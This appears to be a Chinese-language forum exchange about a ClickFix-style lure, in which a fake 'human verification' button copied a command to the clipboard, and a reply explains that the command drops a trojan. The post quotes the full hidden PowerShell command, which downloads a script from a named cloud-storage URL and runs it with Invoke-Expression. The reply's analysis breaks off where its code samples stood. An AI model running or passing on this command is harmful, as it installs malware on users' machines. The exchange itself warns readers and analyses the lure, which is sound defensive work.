这是输入:
cmd.exe /c powershell -WindowStyle Hidden -Command "$rQd='https://fixedzip.oss-ap-southeast-5.aliyuncs.com/run.txt'; $pLs=New-Object System.Net.WebClient; $sLf=$pLs.DownloadString($rQd); Invoke-Expression $sLf;"
这是在我点击某个视频下载网络应用上的“人工验证”按钮后出现在剪贴板上的。它告诉我,为了进行验证,我必须按 Win + R、Ctrl + V,然后按 Enter。
值得庆幸的是,我已经知道 Win + R 的作用,所以我没有遵循那些“验证说明”。
它看起来像是下载了一些东西,但我不确定还有什么。
为了帮助您了解该命令正在做什么,并可能帮助未来遇到类似问题的读者,这确实是在下载并执行木马。
您可以通过简单的步骤来确定这一点,首先使用以下命令检查 URL 内容
Invoke-RestMethod
:您将看到内容是 PowerShell 脚本。紧接着,您可以
run.zip
在脚本顶部看到可疑内容,如果您将.zip
URL 粘贴到https://www.virustotal.com/中,则可以看到它确实是恶意的:添加注释来了解代码的作用:
总结一下,
-Command
您将执行: